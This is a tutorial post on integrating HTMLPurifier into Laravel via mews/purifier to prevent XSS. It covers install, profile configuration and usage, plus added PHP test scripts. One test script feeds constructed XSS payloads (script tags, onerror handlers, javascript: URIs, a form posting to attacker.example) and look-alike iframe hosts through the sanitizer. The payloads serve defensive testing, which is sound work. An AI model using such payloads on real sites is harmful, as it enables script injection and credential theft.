Laravel 5/6/7/8: Using mews/purifier to Integrate HTMLPurifier and Prevent XSS (Cross-Site Scripting)

Song · 2021-01-28

This post covers using the mews/purifier package to integrate HTMLPurifier into Laravel 5.* and defend against XSS. Laravel already does well here in everyday use: Blade's `{{ }}` echo escapes output, which is enough for plain text. But when you render rich text produced in the application (article bodies, user comments and so on) you have to use `{!! !!}` so that the browser interprets the HTML, and at that point the HTML must be filtered before it is stored or rendered.

HTMLPurifier is a standards-compliant rich-text HTML filter written in PHP. It works from an allowlist: it parses the input, keeps only the elements, attributes and CSS properties you permit, and validates attribute values (for example rejecting `javascript:` URIs), which is what makes it suitable for preventing XSS. See the HTMLPurifier website for details.

I. Installing Purifier

Purifier (mews/purifier) is the package that integrates HTMLPurifier into Laravel 5.*; install it with Composer:

1. Install with composer require
composer require mews/purifier

This is the recommended method: it adds only this package and its dependencies without updating the other packages already in the project, which saves time.

2. Install with composer update

Add "mews/purifier": "~3.0" to the require section of composer.json and run composer update:

{
    "require": {
        "laravel/framework": "~5.0",
        "mews/purifier": "~3.0"
    }
}

II. Configuration

1. Laravel 5.0 to 5.4:

After installation, register the service provider in the providers array of config/app.php:

'providers' => [
    // ...
    Mews\Purifier\PurifierServiceProvider::class,
],

Then register the Purifier facade in aliases:

'aliases' => [
    // ...
    'Purifier' => Mews\Purifier\Facades\Purifier::class,
],

2. Laravel 5.5 and later

Package discovery registers the service provider and the facade automatically; nothing needs to be added to config/app.php.

3. Publishing the configuration

To use your own settings, publish the package configuration into the config directory:

php artisan vendor:publish --provider="Mews\Purifier\PurifierServiceProvider"

This creates config/purifier.php with the contents below. The `settings` array holds named profiles: `default` is used when `clean()` is called without a profile, and any other key (`test`, `youtube`, ...) is selected by passing its name. The `custom_definition`, `custom_attributes` and `custom_elements` entries are not profiles; mews/purifier reads them to extend HTMLPurifier's element and attribute definitions (here with a set of HTML5 tags). An element defined there is still only output if the active profile's `HTML.Allowed` permits it, so `section` or `video` is still stripped by the `default` profile below.

<?php

return [
    'encoding'      => 'UTF-8',
    'finalize'      => true,
    'cachePath'     => storage_path('app/purifier'),
    'cacheFileMode' => 0755,
    'settings'      => [
        'default' => [
            'HTML.Doctype'             => 'HTML 4.01 Transitional',
            'HTML.Allowed'             => 'div,b,strong,i,em,u,a[href|title],ul,ol,li,p[style],br,span[style],img[width|height|alt|src]',
            'CSS.AllowedProperties'    => 'font,font-size,font-weight,font-style,font-family,text-decoration,padding-left,color,background-color,text-align',
            'AutoFormat.AutoParagraph' => true,
            'AutoFormat.RemoveEmpty'   => true,
        ],
        'test'    => [
            'Attr.EnableID' => true,
        ],
        'youtube' => [
            'HTML.SafeIframe'      => true,
            'URI.SafeIframeRegexp' => '%^(http://|https://|//)(www.youtube.com/embed/|player.vimeo.com/video/)%',
        ],
        'custom_definition' => [
            'id'    => 'html5-definitions',
            'rev'   => 1,
            'debug' => false,
            'elements' => [
                // http://developers.whatwg.org/sections.html
                ['section', 'Block', 'Flow', 'Common'],
                ['nav',     'Block', 'Flow', 'Common'],
                ['article', 'Block', 'Flow', 'Common'],
                ['aside',   'Block', 'Flow', 'Common'],
                ['header',  'Block', 'Flow', 'Common'],
                ['footer',  'Block', 'Flow', 'Common'],

                // Content model actually excludes several tags, not modelled here
                ['address', 'Block', 'Flow', 'Common'],
                ['hgroup', 'Block', 'Required: h1 | h2 | h3 | h4 | h5 | h6', 'Common'],

                // http://developers.whatwg.org/grouping-content.html
                ['figure', 'Block', 'Optional: (figcaption, Flow) | (Flow, figcaption) | Flow', 'Common'],
                ['figcaption', 'Inline', 'Flow', 'Common'],

                // http://developers.whatwg.org/the-video-element.html#the-video-element
                ['video', 'Block', 'Optional: (source, Flow) | (Flow, source) | Flow', 'Common', [
                    'src'      => 'URI',
                    'type'     => 'Text',
                    'width'    => 'Length',
                    'height'   => 'Length',
                    'poster'   => 'URI',
                    'preload'  => 'Enum#auto,metadata,none',
                    'controls' => 'Bool',
                ]],
                ['source', 'Block', 'Flow', 'Common', [
                    'src'  => 'URI',
                    'type' => 'Text',
                ]],

                // http://developers.whatwg.org/text-level-semantics.html
                ['s',    'Inline', 'Inline', 'Common'],
                ['var',  'Inline', 'Inline', 'Common'],
                ['sub',  'Inline', 'Inline', 'Common'],
                ['sup',  'Inline', 'Inline', 'Common'],
                ['mark', 'Inline', 'Inline', 'Common'],
                ['wbr',  'Inline', 'Empty',  'Core'],

                // http://developers.whatwg.org/edits.html
                ['ins', 'Block', 'Flow', 'Common', ['cite' => 'URI', 'datetime' => 'CDATA']],
                ['del', 'Block', 'Flow', 'Common', ['cite' => 'URI', 'datetime' => 'CDATA']],
            ],
            'attributes' => [
                ['iframe', 'allowfullscreen', 'Bool'],
                ['table', 'height', 'Text'],
                ['td', 'border', 'Text'],
                ['th', 'border', 'Text'],
                ['tr', 'width', 'Text'],
                ['tr', 'height', 'Text'],
                ['tr', 'border', 'Text'],
            ],
        ],
        'custom_attributes' => [
            ['a', 'target', 'Enum#_blank,_self,_target,_top'],
        ],
        'custom_elements' => [
            ['u', 'Inline', 'Inline', 'Common'],
        ],
    ],
];
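To see what these profiles actually do to hostile input, here is an added example (mine, not code from the post or from mews/purifier) that rebuilds the `default` profile and the `youtube` profile with plain ezyang/htmlpurifier, the library mews/purifier wraps, and runs constructed XSS payloads through them from the command line. It also tries a tightened iframe regexp: in the one shipped above the dots are unescaped regex wildcards, so a host such as `www-youtube-com` also satisfies it. The strict regexp (https only, video id anchored to the end) is my own choice of policy, not something the package provides, and all payloads and host names are constructed for the demonstration.

```php
<?php
// Added example, not code from the original post or from mews/purifier.
// Drives ezyang/htmlpurifier directly, so it needs only
// `composer require ezyang/htmlpurifier` and runs outside Laravel.
require __DIR__ . '/vendor/autoload.php';

/** HTMLPurifier_Config equivalent to the "default" profile of config/purifier.php. */
function defaultProfileConfig(): HTMLPurifier_Config
{
    $config = HTMLPurifier_Config::createDefault();
    $config->set('Core.Encoding', 'UTF-8');
    $config->set('HTML.Doctype', 'HTML 4.01 Transitional');
    $config->set('HTML.Allowed', 'div,b,strong,i,em,u,a[href|title],ul,ol,li,p[style],br,span[style],img[width|height|alt|src]');
    $config->set('CSS.AllowedProperties', 'font,font-size,font-weight,font-style,font-family,text-decoration,padding-left,color,background-color,text-align');
    $config->set('AutoFormat.AutoParagraph', true);
    $config->set('AutoFormat.RemoveEmpty', true);
    // No definition cache for a throw-away script; in the app, cachePath provides one.
    $config->set('Cache.DefinitionImpl', null);
    return $config;
}

/** Config for the "youtube" profile, parameterised by the iframe allowlist regexp. */
function iframeProfileConfig(string $safeIframeRegexp): HTMLPurifier_Config
{
    $config = HTMLPurifier_Config::createDefault();
    $config->set('Cache.DefinitionImpl', null);
    $config->set('HTML.SafeIframe', true);
    $config->set('URI.SafeIframeRegexp', $safeIframeRegexp);
    return $config;
}

/** Run every payload through one purifier and return label => cleaned HTML. */
function purifyAll(HTMLPurifier_Config $config, array $payloads): array
{
    $purifier = new HTMLPurifier($config);
    $cleaned  = [];
    foreach ($payloads as $label => $dirty) {
        $cleaned[$label] = $purifier->purify($dirty);
    }
    return $cleaned;
}

// Constructed payloads: classic vectors that {!! !!} would hand straight to the browser.
$xssPayloads = [
    'script tag'       => '<p>hello</p><script>alert(1)</script>',
    'event handler'    => '<img src="/avatar.png" onerror="alert(1)">',
    'javascript: href' => '<a href="javascript:alert(1)" title="t">click</a>',
    'css url()'        => '<span style="color:red;background:url(javascript:alert(1))">x</span>',
    'unlisted tag'     => '<form action="https://attacker.example/steal"><input name="pw"></form>',
];

echo "== default profile ==\n";
foreach (purifyAll(defaultProfileConfig(), $xssPayloads) as $label => $clean) {
    printf("%-17s %s\n", $label . ':', $clean === '' ? '(removed entirely)' : $clean);
}

// The regexp shipped in the "youtube" profile, and a tightened one (my assumption of a
// sensible policy): dots escaped so "www.youtube.com" no longer matches "www-youtube-com",
// https only, and the video id anchored to the end of the URI.
$looseRegexp  = '%^(http://|https://|//)(www.youtube.com/embed/|player.vimeo.com/video/)%';
$strictRegexp = '%^https://(www\.youtube\.com/embed/|player\.vimeo\.com/video/)[A-Za-z0-9_-]+$%';

// Constructed iframe payloads; the look-alike host is a single valid DNS label.
$iframePayloads = [
    'real youtube'     => '<iframe src="https://www.youtube.com/embed/abc123"></iframe>',
    'look-alike host'  => '<iframe src="https://www-youtube-com/embed/abc123"></iframe>',
    'arbitrary origin' => '<iframe src="https://attacker.example/phish"></iframe>',
];

foreach (['loose' => $looseRegexp, 'strict' => $strictRegexp] as $name => $regexp) {
    echo "== youtube profile, $name regexp ==\n";
    foreach (purifyAll(iframeProfileConfig($regexp), $iframePayloads) as $label => $clean) {
        printf("%-17s %s\n", $label . ':', $clean === '' ? '(removed entirely)' : $clean);
    }
}
```

Compare the two iframe runs: under the loose regexp the look-alike host keeps its `src`, under the strict one only the genuine embed URL does. If you keep `http://` or protocol-relative `//` in your own regexp, remember that both let an embed be served over plain HTTP.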

III. Using Purifier

Default profile

clean(Input::get('inputname'));

or

Purifier::clean(Input::get('inputname'));

(The Input facade was removed in Laravel 6; there, read the value with $request->input('inputname') or the request() helper instead.)

Choosing a profile per call

Pass either the name of a profile from config/purifier.php or an array of HTMLPurifier directives as the second argument (a `titles` profile like the one used here has to exist under `settings` first):

clean('This is my H1 title', 'titles');
clean('This is my H1 title', ['Attr.EnableID' => true]);

or

Purifier::clean('This is my H1 title', 'titles');
Purifier::clean('This is my H1 title', ['Attr.EnableID' => true]);

Adding a URI filter

A closure passed as the third argument receives the HTMLPurifier_Config object after it has been built for the chosen profile, so you can attach an HTMLPurifier_URIFilter to the URI definition (HTMLPurifier_URIFilter_NameOfFilter stands for your own filter class):

Purifier::clean('This is my H1 title', 'titles', function (HTMLPurifier_Config $config) {
    $uri = $config->getDefinition('URI');
    $uri->addFilter(new HTMLPurifier_URIFilter_NameOfFilter(), $config);
});
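As an added example (mine, not from the post or the package) of that hook in use, here is a custom URI filter that restricts embedded resources such as `img src` to an allowlist of hosts, wired into a comment-saving controller. The filter class, the host names, the `Comment` model and the `comments.show` route are assumptions made for the example; the two namespace blocks would be two files in a real application.

```php
<?php
// Added example, not code from the original post or from mews/purifier.
// Class name, hosts, Comment model and route below are assumed for the example.

namespace App\Purifier {

    use HTMLPurifier_URIFilter;

    /**
     * Only let embedded resources (img src, video poster, ...) load from an allowlist
     * of hosts. Returning false from filter() makes HTMLPurifier drop the attribute;
     * plain links (<a href>) are not "embedded" and pass through unchanged.
     */
    class EmbeddedHostAllowlist extends HTMLPurifier_URIFilter
    {
        /** HTMLPurifier indexes registered filters by this name. */
        public $name = 'EmbeddedHostAllowlist';

        /** @var string[] lower-case host names (assumed for the example) */
        private $hosts;

        public function __construct(array $hosts)
        {
            $this->hosts = array_map('strtolower', $hosts);
        }

        public function filter(&$uri, $config, $context)
        {
            if (!$context->get('EmbeddedURI', true)) {
                return true;   // href and similar: not a resource load
            }
            if ($uri->host === null) {
                return true;   // relative URI: served by this site
            }
            return in_array(strtolower($uri->host), $this->hosts, true);
        }
    }
}

namespace App\Http\Controllers {

    use App\Models\Comment;                 // assumed model with a fillable "body" column
    use App\Purifier\EmbeddedHostAllowlist;
    use HTMLPurifier_Config;
    use Illuminate\Http\Request;
    use Mews\Purifier\Facades\Purifier;

    class CommentController extends Controller
    {
        public function store(Request $request)
        {
            $data = $request->validate(['body' => 'required|string|max:20000']);

            // The second argument names a profile from config/purifier.php (or passes an
            // array of directives); the hook is attached to the config built for it.
            $clean = Purifier::clean($data['body'], 'default', function (HTMLPurifier_Config $config) {
                $config->getDefinition('URI')->addFilter(
                    new EmbeddedHostAllowlist(['cdn.example.com', 'images.example.com']),
                    $config
                );
            });

            // Store the cleaned HTML; the view can then render it with {!! $comment->body !!}.
            $comment = Comment::create(['body' => $clean]);

            return redirect()->route('comments.show', $comment);
        }
    }
}
```

For the simpler policy "no external resources at all", HTMLPurifier already ships the `URI.DisableExternalResources` directive and needs no custom filter; a filter class like this one is for policies it does not have built in, such as a host allowlist.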

Laravel 4: see HTMLPurifier for Laravel 4

Laravel 5: see Using the Purifier package in Laravel 5.* to integrate HTMLPurifier and prevent XSS

FAQ

  • On first use Purifier wraps the output in <p></p> by default, which is often convenient; if you do not want it, change this setting in config/purifier.php:
    'AutoFormat.AutoParagraph' => false,

GitHub: HTMLPurifier for Laravel 5/6/7/8
